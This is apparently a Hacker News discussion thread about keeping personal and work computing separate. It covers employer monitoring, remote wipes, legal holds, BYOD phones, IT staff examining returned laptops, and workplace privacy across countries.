As for what happens if your Chromebook is stolen and you've not selected the option to lock it when the lid is closed, Workspace/GSuite accounts can be remote wiped, personal ones cannot. Perhaps with the upcoming Workspace Individual plan, remote wiping of personal accounts will be possible too.
I live in Australia, which generally has decent (but slowly eroding) workplace protections. But I managed to get fired and walked out of the building with zero notice. So I would not count on this even in a country with traditionally strong labour laws.
That’s a non sequitur. Access can be revoked on a machine with something like an MDM system the next time it gets network access, whether you’re fired or not.
Certainly if a machine is stolen I’d expect it to be remotely wiped. Same with a phone.
If you have hardware that isn’t under an mdm system though that’s different.
Even if a company can't fire you immediately, they can certainly revoke your access and remove all of your responsibilities while they process your termination.
I would say that not allowing a company to fire someone immediately, say, if they're looking at porn on their work computer during work time in front of the entire work office, is unreasonable.
There are many cases where this is good advice--and certainly if you're the director of the CIA. There are of course additional reasons, including company policy and as peer comment says side projects, to keep personal and work devices separate. But I also don't think one-size fits all rules apply. I'm not going to carry two laptops when I travel.
Did you consider booting off an external drive? Macs work really well in this scenario. Windows is notoriously bad at booting off USB (though I'm not sure if this is still the case). But Macs can do it really well. Linux too.
I used to do this in earlier times when personal use was still a very dark thing (in our company it has since become normal - at least web browser stuff). In the days I carried a ThinkPad T42 I would just slip the HDD caddy out and stick in my own at night in the hotel.
Later on I ran my own macOS on a company mac from a USB 3 HDD. Just hold option when booting. You can even encrypt both to secure them from each other.
Luckily these days I don't have to bother with any of that anymore. But they weren't too bad options as long as you don't need both environments at the same time.
On Windows systems with BitLocker, booting off an external drive (or shoot, even opening the bios to look and see how much RAM was installed, as happened to me once) will often trip the BitLocker recovery prompt which means you have to call IT and ask for the magic 48 character password to get back into your laptop, to which they inevitably ask "why did that come up".
Yeah, the carrying two laptops part is also my issue. Of course, I am well within my rights to not take my work laptop with me when I go anywhere and if a disaster strikes, I can just tell my manager to sod off - but it's just easier to take the work laptop and do my YouTube watching on it.
(I'm technically not on call but on practice it's messier)
Not the most environmentally friendly and may be against company security policies in certain places, but if you’re going traveling you could leave the work laptop plugged in and remote if disaster strikes (part of the point of this is that it shouldn’t be routine).
As for me, I’ve done the two-laptop thing when traveling since 5y or so. It’s actually worth it for other reasons too - having your only computer have a hardware failure or be stolen in the jungle is no fun. If both are of the same make you could even boot one’s drive off the other in a pinch.
For all the “what about X?” questions in this thread... you will figure it out easier and faster than you think once you force yourself to change habits.
I love the shocked Pikachu face when I show up at someone's desk, let them know their laptop is part of an ongoing investigation, and IT will be by soon to give them a new one.
How does that work these days when people no longer work at their desk in the office?
Just one of the many ways that dual-use is becoming more common. And OSes are increasing their abilities for it too. Mobile OSes are already great at separation. Windows is coming along slowly with Windows Information Protection and Azure Information Protection. Mac has user enrolment but it's in its infancy, sadly.
Your companies lawyers or personnel security people call you and say your devices are being placed on a legal hold. Don’t deleted anything or you might have to deal with the courts. The large MegaCorp I work for had some training that included stuff about lawsuits.
Ok yeah we do get that sometimes in our company but it's always triggered by external causes (some supplier being unhappy about a deal or something, they never tell me the full story). So it only affects people dealing with external parties. And always in the US, never seen it anywhere else. Though it seems to be increasingly prevalent there.
They are using company owned assets, or devices that the company has an interest in. For example one of my former employers paid a percentage of your monthly cell phone bill as part of the BYOD program, which also involved you agreeing to turn over and unlock the device on request.
You can also be compelled by the courts to surrender a device that holds information relevant to a civil or criminal matter. For example sending text messages to a coworker on your personal phone about how you are going to coordinate your efforts to block someone's promotion.
Unless you actually have rogue employees I'm guessing you'll be able to do this once or twice before you get told to stop making people lose an afternoon or even entire days of productive work because of bullshit like that.
I actually believe that certain government officials (including the director of the CIA) are asked not to have personal cellphones because that could reveal their location. IIRC, Obama needed to have some special technical work done so he could use an iPhone.
At all the jobs I've had, any code that I write using company-owned resources, even if done on my time, the company asserts ownership over. I like to work on open source projects on the weekends, and so that absolutely requires a non-work computer.
I mentioned elsewhere, but I run an encrypted linux VM for anything personal and run all its network traffic through a VPN. I think it's a pretty good compromise between mixing work/personal, and carrying two laptops.
Hotel WiFi can be pretty awful. To be honest, this isn't a problem for me. I don't separate usage pretty much at all. I'm not sure what I would do if it were a bigger deal.
This was part of the reason I bought a PinePhone. It's not for everyone but it's a bout as powerful as my personal laptop (yes I know, it's 10 years old though.) I've carried work+personal laptops before and that can get heavy enough to start hurting my back so I generally avoid it now.
Many years before I left my company, I purchased my own equipment for personal use. I actually had better equipment than that provided by my employer.
They monitored the living bejeezus out of my work equipment, and wouldn't let personal equipment (including phones) connect to the corporate network.
It was pretty overboard, but my company was seriously paranoid. It actually caused problems. For example, we wrote optimized C++, and optimizing on a monitored system is...difficult; especially with some of the custom gnarlyware we got from companies like Intel.
It also meant that I never worried about mixing my personal work with company work. If I had personal equipment at work, I would use 4G/hotspot. Not ideal (so I didn't really do anything more than check emails at work). It also allowed me to get to some of the banned sites (the company had a nasty habit of banning exactly the kinds of sites that optimizers like to read).
Another benefit was that I left my work equipment at work, so I couldn't easily be roped into doing out-of-band work. I had a great excuse.
It was annoying, but fine with me. I think the company went way overboard in their paranoia, but it was their company, and they got to set the rules. I have never had any interest in causing issues with them, so I was careful not to do anything that would step on their toes. They pretty much returned the favor.
I laughed reading this article. It draws a very broad conclusion of "No personal use" based on a straw man story of a cleared person (wait for it) viewing "high risk porn sites" on his work laptop. Yes, there's an argument for not engaging in NSFW activities on employer assets or being extra cautious when you hold a security clearance. There's also a big difference between that and, say, posting on HN which I'm doing right now. It's shades of gray based on individual circumstances.
Nitpick: Deutch had two Macintosh Desktop computers at home (one in Maryland and one in Belmont). He did also have a laptop (marked UNCLASSIFIED) that was found to have classified data on it, but it's not clear that this was used by his family.
In addition, he had PCMCIA cards (this was before thumb drives) that contained classified data and were used in the unclassified desktops and/or laptops.
Anec-tangent: when I left a start-up, I turned in the company laptop. Then when I asked if I could buy it back (since it nicer than my personal laptop), they just gave it to me for free. That was a really nice and totally unexpected gesture.
Later I gave that laptop to someone to learn to code on and now they're a full-time software engineer.
There's a lot of "one device versus two device" discussions here. I have a work laptop and a personal laptop that I use carefully to try and keep things separate. But, this means I'm now ~doubling the environmental impact of electronic devices (impact of production, disposal). So there's tension, in my mind, between the public/private work separation and minimizing the damage I'm doing the environment.
In all fairness, I suspect me buying 2 laptops every 3-4 years instead of one laptop over the same period is a small environmental impact compared to other things (air travel, dietary choices). But it also seems like that's not a reason for me to ignore its impact. And the aggregate cost of many people having 2 laptops instead of 1 is probably worth considering.
I thought about ways to only have one device (running my personal "machine" as a VM on my work laptop or vice versa) but couldn't come up with anything cleanly satisfactory.
I think the environmental impact is overstated. There's a healthy second hand market that thrives because of companies buying laptops and eventually selling them. I've gotten plenty of great laptops at great discounted prices over the years that probably wouldn't be possible otherwise.
I remember when advice to not use company/official email for personal correspondence was considered a radical idea. Why would anyone need two email accounts?
Today I don't even want my personal phone connecting to corporate wifi. I work with these cats, I know how they think. So yes, two devices please.
Yet today phones have really excellent separation of personal and private data. Like Android Work Profile which basically is a small virtual phone inside your phone which is controlled by your employer, with the benefit that they can't look at any of your personal stuff and you can switch the whole thing off easily.
What did you find lacking with the VM approach? Have you considered or tried Qubes?
I’m a two-decvicer. It increases the lifespan of my personal computer. And, more often than not, when I have left a job, employers have let me keep the old laptop, saving me from buying a new personal one. Honestly, are you really telling me you’d not own a personal computer? This sounds extremely trusting towards your employer, and puts you at a lot of risk depending on their policies and philosophy.
> What did you find lacking with the VM approach? Have you considered or tried Qubes?
It wasn't technical aspects of VMs per se, it was how to use them while still keeping things separate. If I had my personal machine as a VM on work baremetal, then in principle the personal VM wouldn't really be isolatable from work because if they had a keylogger then it would capture all input.
Edit: To be clear, I don't think that my employer uses keyloggers. But if the purpose was to keep personal and work separate, I didn't think a personal VM on a work machine really provided enough separation.
I didn't carefully investigate the reverse (having my work machine be a VM on top of a personal laptop) partly because MacOS is easiest for a work machine and I didn't want to mess around with trying to run MacOS in a VM.
> This sounds extremely trusting towards your employer, and puts you at a lot of risk depending on their policies and philosophy.
Obvious stupid uses of work laptops are beyond the pale, but I can see why someone would check their gmail from a work laptop (I'm posting this on my work laptop while my code compiles).
But one thing I found which is great is setting up my work and personal laptops next to each other on a laptop holder and doing everything through external monitors.
At my desk I have an adjustable laptop holder which holds my work and personal laptops, as they're both macbooks switching between my work and personal laptop is as simple as unplugging a couple usb-c hubs, plugging them into the other laptop (the port is 1 inch away), and pulling out my other keyboard.
I do the same, but my USB hub holds keyboard, mouse, headphones, webcam, and a Wacom tablet. I have a large 4K monitor with an HDMI port going to each laptop, so I switch the monitor to read from the other input, move one USB cable, and I'm on the other laptop. No need even to switch keyboards - all the peripherals come along together.
I totally don't agree with his sentiment. And I manage 200,000 endpoints (computer and mobile)
This sentiment is a typical early 2000s mindset. It no longer works in this world where the line between business and private lives have blurred. And it wasn't just the pandemic that did that, this has been going on much longer.
Who wants to bring 2 laptops on a business trips? Or 2 phones for that matter? Computing is flexible in the age of the cloud. Mobile OSes are really good at separating personal and private data (think of Android's Work Profile and iOS's User Enrolment). Personal computers (either Mac or Windows) don't do this as well yet, but at least they're a hell of a lot more secure with everyone enforcing disk encryption now.
But we should remember that technology is there to serve us. If the tech can't deal with our increasing mix of private and business, we'll just have to make it better at that. Telling people not to do it just won't work.
I have one exception: Installing personal apps on a work computer is not really OK (unless the application has already been approved for work too). On mobile this is fine because of the more rigid separation.
PS: This is not just my opinion, it's the company's policy. We explicitly allow personal use (including apps) of mobile devices and most personal web usage on company laptops (though blocking malicious sites and stuff that's not really "business oriented" :) ). We do block some things like sideloading on mobile. Our devices are still secure because we enforce what's important (like decent passwords, full disk encryption). Our users are happier because we don't treat them like children. We're happier because we don't need to approve every taxi app anymore that a user would want to use on their work phone during a business trip. We just make sure their apps can't access the work apps. On mobile this works really well and on PC/Mac it's in the works.
It's a give and take. The early 2000's us-against-them BOFH total lockdown thing just doesn't fly anymore.
I know where you're coming from -- a key reason Blackberry failed in my view was that it was pitched to corporate IT and stopped people from doing anything on their device. This worked until the time when people in charge of actual important departments (not BOFHs) were getting iphones for their wives and kids, and wanted to be able to play angry birds on their phone. As that wasn't possible on a blackberry thanks to the IT policies, they said "fine, give me my mail on my iphone as I'm not carrying two phones"
In other organisations I'm sure those IT policies remain, but certainly in my part of my organisation I have a vanilla desktop, which replaced my vanilla laptop (haven't used it for 3 years). There's a corporate laptop (which is vanila OSX with MDM), but more and more corporate services are available on web and I haven't used it for over a year.
I haven't paid for a mobile phone since I got my first work phone in 2006 (when phones were just for phone calls and sms). Most people in my organization that had phones back then (we tend to stay in the same company for life) are still one-device people.
So yes, from an organisation point of view, it's an antiquated mindset about control over worker drones.
In my experience, it's younger people who didn't join or get to a point where they had a work phone until after the smartphone revolution, that tend to carry two phones - a personal one and a work one.
> I have one exception: Installing personal apps on a work computer is not really OK (unless the application has already been approved for work too).
So the approved usage is more-or-less only the web browser? If the user can make do with that for their personal stuff, they would probably be happier with a tablet anyway. If they can't, then, well, they need two laptops.
Pretty much this. I have no problem with people watching Netflix or checking their email, or whatever. If it's not likely to create security problems for us - or at least, we already accept any security problems it has (as is the case for web browsing)... meh, why would I care?
Writing a personal doc on the work machine is a non issue assuming a) it’s not sensitive in any way and b) it’s not getting you in trouble any other way.
Of course I do my personal coding on my own machine because of ownership/legal issues.
But replying with Gmail to my plumber or drawing my new kitchen using the CAD software on my work laptop or writing the invitations to the neighborhood barbecue if it’s more convenient? I’m just going to assume nothing bad will come of it.
Sensitive data, competing business, security risks, sure. But that’s pretty rare. Convenience easily trumps it.
I used the company laptop as a personal laptop for far too long as well until this year. Even when I considered leaving my job, I thought to myself "well crap, then I need to buy a new laptop first", so my ability to find a new job was tied to my current employer (imagine being fired and have to hand over my only laptop).
Separating work and personal machines also improved my WFH experience. When I shut down my work laptop, I put it in the drawer and the work day is done. Whatever happens, I will have to deal with it the next morning. And to avoid that, no deployments at about 1h before I leave so I don't get dragged into hot-fixes. If it's an urgent fix and it's end of day, I just stay a little longer, at least I have more control that way and no phone calls interrupting my evening.
My first ever office job was working for a local government, where one of the first things they told me when giving me a laptop was that the previous person in the position had been FOIAed and had to hand over the laptop to attorneys in the past so to be very careful about anything I did. This attitude has served me well in life.
I have a desktop at work that belongs to the company, but I used my personal laptop since not so long ago. Most other employers uses their personal devices. I just opted for a desktop for a question of practicality, not having to carry around a laptop and connect it every day. I of course still use my laptop or a home desktop if I work from home.
If you have a good relationship with your boss you can do that, in the company we all manage our own devices, meaning that the operating system and stuff is decided and installed by whoever uses the computer (Linux, Windows, macOS, whatever you are more practical, that is also an advantage since we ensure you can develop a project on all platforms). Also we have basically have all admin access on everything personal and everything that is shared (shared computers in the office, network equipment, servers, etc).
I could not see working on a place where I have to pay attention on what I do on a particular device if not they will punish me. To me it doesn't really make sense, the computer that I'm using is mine till I use it, of course if I change job that computer will be formatted and used by another person.
There is this concept but to me it only slows down work. If I have to do something personal related on the desktop at work I do it on the desktop, similarly if I'm at home and I have to do a fix on a production system I do that on my personal laptop, or I answer a Teams call from a coworker from my mobile phone.
> who in addition to accessing those university resources also visited several "high-risk" porn sites, one of which had placed cookies on the computer.
Get this, Charlie; get this, Charlie! It's cookies... Cookies! Oh, the humanity!
I get to see the crazy stuff people do on work laptops all the time. After letting one guy go for poor performance, a quick scan of his machine showed he was spending a majority of his time reading and commenting on incel message boards. Nevermind the porn.
Never ever put anything personal on a work laptop. I recommend remote desktoping to your personal machine and doing all your personal stuff on that machine, so you get the best of both worlds.
I'm convinced the doorway to personal use on work hardware is the free printing. I still find half printed mapquest directions piling up in the copy room, in this day and age no less.
It only takes one time arriving in a new city by air at 11pm and your phone becoming non-functional prior to reaching the rental car to make one bring a redundant set of paper directions to get to the hotel.
My redundancy these days is having a cellular-equipped iPad.
It's saved my bacon a few times at this point. Basically a (large and unwieldy) cell phone I can pull out when my main driver falls dead.
Pro tip: install ride share apps on the tablet in advance, because in a serious UX fail, Uber and Lyft both want you to receive an SMS code to activate accounts. I was lucky that time, that getting my iPhone out of airplane mode at 1% battery wasn't enough to trigger forced shutdown.
Lyft doesn't even have a separate app, but Uber actually offers an iPad-native experience, but is unable to activate you without SMS. Which, along with standard voice calls, is the one thing a data plan associated with a phone number won't let you do except from the primary advice.
> Pro tip: install ride share apps on the tablet in advance, because in a serious UX fail, Uber and Lyft both want you to receive an SMS code to activate accounts. I was lucky that time, that getting my iPhone out of airplane mode at 1% battery wasn't enough to trigger forced shutdown.
Uh-uh. Because you can just use a payphone to call one, right?
When I lost my phone in Madrid, and realized that I have no way to call a taxi, since I was staying in a residential area where you don't see taxis in the streets.
My Spanish was barely sufficient to explain my predicament, and I lucked out because a random convenience store clerk called me a taxi from his phone.
Which reminds me: in case you didn't notice, there are no more payphones. In 2001, I could walk up to one, and use one of them Yellow Books to do anything you could do one the phone.
Today, you need to have a smartphone to do many basic things.
Really? I live in Barcelona and there are always taxis ready for the hailing :) Uber and Lyft are not common here, though a local alternative, Cabify is. But whenever I use cabify I need to wait for ages for them to get there, and tens of taxis pass me during this time. So I only use them when I want the quiet of a nice car or when I want to know how much I'll pay in advance.
There are still some payphones here too, but most of them have been vandalised, that's true.
That very much depends on location and time. Smaller airports particularly, in off hours, may only have ten to twelve, which is not enough for that late plane that's coming in.
As part of my firewalling work from personal at my new job, I have been thinking "cellular iPad" for an ultra-portable personal machine that can also poke a personal server if needed.
(Well, that or Pi 400, but I worry how well the Pi 400 would hold up for travel, or about getting a hotel room with no easy HDMI on the TV)
Consider a AAA membership. Their maps are high-quality, frquently-updated, and entirely free. You can walk into any AAA on any day and get as many free maps as you can carry.
Not to mention the roadside assistance and towing coverage. I take long roadtrips too. The couple times that AAA has saved me make all the yearly dues worthwhile. E.g., once they arranged a 300-mile tow from a small coastal town back home; it took less than an hour to setup and didn’t cost me a dime. The alternative would have been paying next-day air freight on a Mercedes alternator and battery, and staying another 2 days to get the work done.
There are at least hundreds and probably thousands of locations. AAA is shockingly good. Maybe not shocking if you consider it's a 120-year-old nonprofit member services organization, but still: anyone who drives an auto in America is leaving serious value on the table if they aren't a member.
The bottom line is that if you're having a problem and you're in an automobile (doesn't have to be yours) AAA will do their best to help you solve that problem.
Unlimited, free, high-quality paper maps are just another perk. Walking in to a member branch and walking out with maps is just the beginning: a AAA employee will help you plan out a road trip, and make what's called a TripTik, which is a custom spiral-bound route map, with various sorts of amenities you can choose pointed out for you.
There are campgrounds as well. It's truly remarkable how much AAA offers.
They are very common--even tiny cities in the US will have an office somewhere. In fact, they're one of the few places to easily pick up properly formatted and valid international drivers licenses before you go overseas.
However, I would caution you that some of the benefits that used to come from being an AAA member have been severely curtailed. The towing benefit, in particular, now has quite a few restrictions on it.
First 'real' job I had I was a 20 something working in an office of mostly 40+ guys. (dot.com era had taken off and the company needed warm bodies)
As typical I became the guy who could help coworkers fix basic PC stuff quick. I didn't mind this as I got to know my coworkers and really just did simple things for just our small team.
One guy calls me over to help him with why he couldn't open some images on his computer. I fix the file association and ... yeah it's porn.
A little while later a guy brings in an old digital camera (back when they had some weird proprietary formats for images). Yeah his daughters were taking pics of them standing by the highway flashing traffic as it goes by.
Nothing ever came of any of it, but here I was thinking loading a bunch of mp3s on my computer was a bit dicey....
I'm not sure people's attitudes have changed that much in the following decades.
Man, y’all are weird, reading browser history and shit. I would just remote wipe the computer and leave it be. That’s what my last employer did. They just Fleetsmithed it to zero and left me with the MacBook Pro.
Agreed, this is creepy, unnecessary, and possibly even damaging to whatever litigation is pending. (Assuming the litigation thing is even true, which I personally doubt.) Even if they do need an image of the drive, the people in IT shouldn’t be the ones pawing through it. That’s a job for a professional investigator or a lawyer. I ran an IT department for four years and if any of my staff did something like this, at the very least they’d be getting a closed door conversation about why this isn’t ok.
It’s pretty common practice to capture system images from returned employee equipment when they’re fired for cause (at least in the US). But it’s also pretty common for technicians to be forbidden from browsing those files without a very good reason.
Is it, though? I genuinely don’t think so. Performance stuff like this is usually documented via your HR stuff, the PIP etc.
“This guy was browsing incel forums from this time to this time”
Which court in what land uses that information?
Sounds kind of mythical, especially since I’m sure there’s an army of other people on idiot forums like that who are nonetheless performing fine.
EDIT: Okay, you guys hit me with sufficient downvotes that I’m rate limited so I know the predominant view is different.
Fine. I’m not a lawyer, but I’ll tell you this. If some rando IT dude is going through folks’ computers after they quit and I find out, I am quitting your company and telling everyone. I have never done that to anyone reporting to me and no company has ever done that to me. I can’t believe you’d accept these work conditions. Wild.
It makes sense if you think you're likely to have to defend the decision in court. For instance, I've worked on a team where a guy was fired for performance reasons that were obvious to all of us, but he sued and claimed it was discrimination. HR had known of a performance problem and the process was documented, but if the trustworthiness of the manager who gave them all that information is cast in doubt, could they really defend it quickly and decisively in court? We all had to be deposed. Imagine if it became a lengthy court case. I imagine it would be nice for the company to have a paper trail of convincing evidence of a performance problem. A timeline of significant, non-work web browsing during work hours on work machines would do the trick, and protect the rest of the team and the company.
That said, I agree with the commenters that I wouldn't want to work somewhere that did this as a matter of routine. I always have my work laptop encrypted with a key only I know and I have not (yet) been forced to give work root access for management. I'm always confident handing in my laptop that they couldn't find anything even if there was something.
>Fine. I’m not a lawyer, but I’ll tell you this. If some rando IT dude is going through folks’ computers after they quit and I find out, I am quitting your company and telling everyone. I have never done that to anyone reporting to me and no company has ever done that to me. I can’t believe you’d accept these work conditions. Wild.
Every large company I've worked at or heard of it's pretty much assumed that IT may monitor everything you do on their machine. Everyone knew this. Which is why you don't use the company laptop for personal use.
IT may have the legal right and often the technical ability to monitor any activity on work computers.
But it is stupid to allow any old IT staff to do so, and this thread is a good illustration of why: because most IT staff do not have the discipline or smarts to keep what they learn sufficiently confidential. Allowing IT staff to browse the files of other staff at will can lead to other HR problems such as harassment or even blackmail, or loss of corporate reputation if people post embarrassing stuff in, say, a public HN thread.
The ability should be exercised only under the supervision of a lawyer, which limits bad behavior and creates attorney-client privilege for discussions of what might be found.
I worked at a place that did have good 'secrecy' around most monitoring. While I was one of three people outside of Infosec that managed to find out that someone was let go because they were caught exfiltrating client/employee PIFI... I'm pretty sure nobody who was possibly compromised got informed.
This was a place that was so concerned with image that the handbook was about as strict as what my Sister had to deal with when teaching at a Catholic school. Image was everything to them.
Is it same in EU? If I read the law correctly I understood they need a good reason to monitor and they definitely need to notify you and ask for consent.
I have been using my work laptop quite heavily for personal use and I would prefer not to stop honestly.
I believe my intentions are pure and to provide value, I understand world is not perfect, but I would not want to work for an employer that needed to monitor me.
IANAL, but as far as I read into the situation, employee monitoring is a very dangerous field. There are exceptions, however, such as company-provided http(s) proxies and more concrete monitoring or investigation when suspicion arises (I know of two cases where employees were suspected of consuming child porn and they were both monitored as well as having their hardware seized).
Lastly, the companies or specific malicious admins might simply not care about the legality and still monitor you - either for company reasons or simply to stir through your data. If they have admin access to your computer, it's simply not your computer.
Sure, but fortunately we’re not context-free text generators. We are able to see that we are in a thread where the guy was let go for poor performance. Like that shit is not “poor performance”.
That seems like a question for the legal department, not for the IT department.
You're doing this thing that smart people do (I know because I do it myself if I'm not careful) where you way overstep your area of expertise. It's not a good look, avoid the trap.
EDIT: You've changed your stance from a general stance to a specifically ethical stance here, and I agree: it would be better if employers respected the privacy of their employees more.
However, that's just not the world we live in. From the perspective of an employer, you can make your choice to behave ethically regardless of the legal implications, and that's a choice that I would laud you for. But from the perspective of an employee, you shouldn't assume that your employer will behave ethically: on the contrary, I would always assume that your employer is going to go through your computer when you give it back. You can fight that if you want, but that's not the hill I would choose to die on, as there are much worse privacy violations going on.
If you want to see how bad things have gotten, freeze your credit, sign up for credit monitoring, and then start applying for jobs, and see what happens. About 75% of jobs I've applied for in the last few years have tried to pull credit reports--and you can't really stop them as long as they do a "soft" credit check (freezing credit doesn't block this).
Because that is the smart thing to do. I got to purchase my laptop when I left the company, and they still wiped it out before handling it. It protects them and it protects me. I do not want access to any company resource, it can only hurt me. And they are not interested anymore on what was in the laptop either.
> We were investigating the employee as part of their offboarding.
I do not know how it works in your country, but anything that you discover of his personal life becomes a liability for the company. If he had AIDS and now you get that knowledge and it leaks, you may find the company fined for big money. In Europe, again and again, companies are forbidden to use any knowledge gained spying on employees.
What reason would you have to investigate an employee that is leaving the company anyway? Unless it has some contractual impact and your company HR/legal department is aware, there is no reason. "To see what the employee was doing" is not a legal reason.
I strongly agree that IT needs ethical education. That you have access to some information does not mean that you have the right to access it or that it is moral to do so.
(I'm in the US and have worked a similar job as the parent poster and have had to do similar things on several occasions.)
>What reason would you have to investigate an employee that is leaving the company anyway? Unless it has some contractual impact and your company HR/legal department is aware, there is no reason. "To see what the employee was doing" is not a legal reason.
In our case, we would and could never investigate someone for any reason besides HR and/or legal explicitly requesting it for a specific reason and telling us what they wanted us to look for and why. "Fishing expeditions" weren't permitted. (There were a few occasions where such fishing expedition requests did come from them, and our managers would push back and basically professionally tell them to fuck off.)
I'm not sure of any specific laws or liabilities, but I'm sure we also would (and should) have likely been sued if we discovered some sensitive personal information about an employee and that information then leaked. If we inadvertently stumbled across personal things like that during the course of a specific investigation, we would always ignore it and not make any record of it. We didn't care about someone's personal life and didn't intentionally ever look at anything related to it.
Due to the nature of the investigations, it was often unavoidable that we'd end up seeing something at least somewhat personal, even if it's just some random website they habitually browsed appearing multiple times in their browsing history.
So, we would never look at an employee's computer or network traffic "just to see what they were doing" or just because we could. That would definitely be extremely unethical and unprofessional, and if management discovered any of us doing that we surely would and should have been fired. However, I'm not sure if there are actually any laws against that in the US if it's disclosed in the employment contract.
Okay, man, I’ll trust that you’re doing this because they were stealing stuff or something like that but if it’s just sucking at their job then damn, dude. That’s like kinda a shitty thing.
Sure it’s company hardware, and you get to do this shit but damn that shit would be like “I gotta get out of here” if I heard IT was scanning people’s browser history for sucking at their jobs.
EDIT: The lawsuit thing makes this even worse. If I even heard that someone was suing their employees for poor performance I am like straight up blackballing that company and all of its damn subsidiaries as places to work. Like my friends would know, my family would know, friends of my family would know. I’m sorry, this is straight up unacceptable to me.
It's important to document and archive the contents for liability reasons, but the takeaway here is that you should remember that the laptop belongs to the company and you have zero rights to privacy on it, so conduct yourself appropriately.
Depends where. Here in Europe it has been said that a Personal folder cannot be looked at by the company. But ofc it can ask you to delete it or fire you if you spend too much time idling but Personal data is Personal.
>It's important to document and archive the contents for liability reasons
Unless this guy was sexually harassing people, I'm curious how this is going to protect anyone from any kind of liability.
>you should remember that the laptop belongs to the company and you have zero rights to privacy on it, so conduct yourself appropriately.
Yes, but as others have mentioned, just because the company has the right to do that doesn't mean it's either ethical OR good. No one here was asserting the right to privacy on company owned hardware.
I pretty much assume they're watching everything I do on a work computer. I don't do anything that would be too embarrassing to see sitting printed out on my supervisor's desk.
Same here. It's my only Windows machine and the only one that reliably prints some PDFs. If they cared that I'm printing out MLP RPG sheets to play with my daughter I'll have that conversation.
I Never have work email on any other device but works.
I used to work with a security guy who tried to make it a policy that staff would have to hand over their social media logins to make sure that they weren't talking to anyone or having any conversations that were "suspicious".
Fortunately that idea was beaten to a bloody pulp by the HR team before it got off the ground. But you would not believe the mall cop mentality in many companies.
Don't work for a company that wants to "manage" your computer for you. You are assuming liability regardless if you manage it or they manage it. What you end up getting is usually crappy hardware, a bunch of redundant software that is terribly managed and outdated, and being told how to do your job and what software you can use even though you're supposed to be the expert.
The same people installing SolarWinds and requiring you use Outlook with 10 different comprised extensions will be the first to try blaming their employees for installing Docker or kubectl because it wasn't approved software yet you were brought in to be the container expert.
Firefox is handy if you want to occasionally do personal stuff on a work-provided Windows PC, since it has it's own proxy settings (where Chrome uses the Windows settings). Also DNS-over-https. So if you run a proxy on an outside host, it's all still reasonably separated.
I suppose you could wrap it with Windows sandbox[1] if you're paranoid.
Employee tracking isn't anything new or all that surprising. Do everything as if it is going to be made public at some point. EMPLOYERS ARE NOT YOUR FRIENDS.
If they buy you internet, they are tracking it. If they provide you with a computer, they are tracking every click and pointer movement.
Keep work computers and personal computers separate and that includes all methods of IO.
I used to work for a Fortune 10 company, and they retroactively changed their approach to personal data on company computers. Yes, does it sound illegal? Very much NOT so, but they totally got away with it.
....Except there was an accidental malformed script that wiped all the user folders and backup data. Ever wonder what happens to a SAN when every disk shits itself for a few days?
I'll never really know what the outcome of the malformed script was except there was no retroactive application of corporate rules because the thing the rules were meant to apply to simply didn't exist anymore.
Coincidentally, it was also the same day that I quit and decided to work for myself.
More than avoiding keeping the personal stuff on the work laptop, avoid keeping work stuff on personal hardware. When you're off work, you're off work. No email, no notifications, no nothing.
The only work thing I have on my personal phone is Slack, and that's with auto-DND outside work hours. If there's an emergency, you can call me.
Not that simple. My company has BYOD for phone, but my total compensation is crazy good, a lot better than any other opportunity near my location. Why should I run?
I got a phone so shitty that I gave it back. The phone was only going to sit at the bottom of my bag, where I would never hear it. I couldn't even log into Slack since I didn't want to log into Google Play with a personal Gmail account on it.
I don’t personally believe in the concept of employer-owned / managed devices; they’re a Trojan horse into my personal space. I buy my own tools, and use them for my livelihood subject to my own narrowly-defined security locus.
As far as I am concerned, I am your paid consultant, and I will grant to you far more valuable information (via source control or shared docs) over the course of our shared engagement than you will ever grant to me. When you are no longer able or willing to pay me, all of it will disappear in a plume of smoke, like crumbs on a dirty plate.
This is one side of it. Your side. Employers also have valid interests. You may not like that work situations tend to involve asymmetries and power imbalances. They may not be fair. You might not value their interests, but they tend to take steps to protect them.
Whatever you may think about the fairness of these, there are consequences to your actions. With regards to work, laws and policies don't adjust based on what you believe. (They are based on what you do or don't do.)
Nothing I’ve suggested implies a compromise of valid interests; any reasonable security posture assumes that an employee-held workstation is, managed or otherwise, an attack vector whose access must necessarily be quite limited.
As for asymmetries of power, that’s up to you to assess for yourself and your own well-being, as to what you’re willing to cede to someone else. Don’t be weak.
And-by the same token (no VPN pun intended)-if your employment relationship is not based on some degree of trust, you’ve already lost.
I think I know what you mean. The key word to me is "assess", as in "be mindful" of the gap between your goals and reality, your options, and the likely consequences.
Since this kind of aphorism ("Don’t be weak.") can be interpreted in many ways, I like to elaborate. In this context I would say:
* Know your legal rights
* Be proactive, protect yourself, have back-up plans
* Understand the pros and cons of your options; e.g.
standing up for yourself. The downsides may involve employer friction and perhaps legal cost and lost wages. The upsides may be deferred and quite uncertain.
* Pick your battles.
Beyond the individual dimension, raising awareness, organizing, and collective action go a long way towards promoting employee rights. These improve the "menu of options" available to individuals dealing with organizations that tend to benefit from a power imbalance.
The one I think is harder for a lot of people is the phone in BYOD environments.
When I started needing specific apps for work, I also got a work phone. I don't think my employer is doing anything creepy, and now I know if I'm wrong about that, it is contained and severed from my everyday phone.
Get a $30 bottom end prepaid Android phone at Walmart and such. If you're only using it for 9-5 work stuff and expect to be on wifi you don't even need to pay for a cheap SIM card or plan. Yeah it will suck and perform terribly, but who cares it's just for the odd slack/email/etc. notification and that's it.
Are you saying you personally purchased a phone for use as a work device? That's completely bonkers to me. I have a personal phone and a work phone, but I definitely don't pay for the work phone out of my own pocket. I even made them order the case and screen protector I put on it.
Regarding using your work laptop for personal stuff, there is a very important security aspect to it I've not seen many people be careful about.
When installing any software such as applications, or as developers, dependencies for your programming language of choice you're always at risk of installing something that once executed would for example grab your ssh keys and push them to a server somewhere, or all your environment variables, etc,etc.
So, if that happens when doing normal work, it sucks, it's bad, but you were doing your job the best you could.
What I think it should be unacceptable is for this to happen when you're working on your own side projects or your personal stuff.
To avoid this, as everyone suggest, don't use your work laptop, but if you do (example: while traveling, or because your work laptop is more powerful, etc) just create a separate user account on it. Just this simple thing will provide a lot more security and protect your company from a lot of security issues.
I moved my work life onto a Lenovo ThinkCentre connected to a 1440p display and a Rode USB mic. Video isn’t worth it when you have amazing audio. I live my life in a browser and a terminal emulator and the hardware is fully supported by my favourite free and open source OS.
The back looks like this, to give an idea of scale:
What a lovely little platform, especially for $100. That’s a price point that makes hardware replacement easy to stomach. It also freed up my MBP for personal stuff only.
Being a desktop it also means I have to “go to the office” to do work stuff. Bliss.
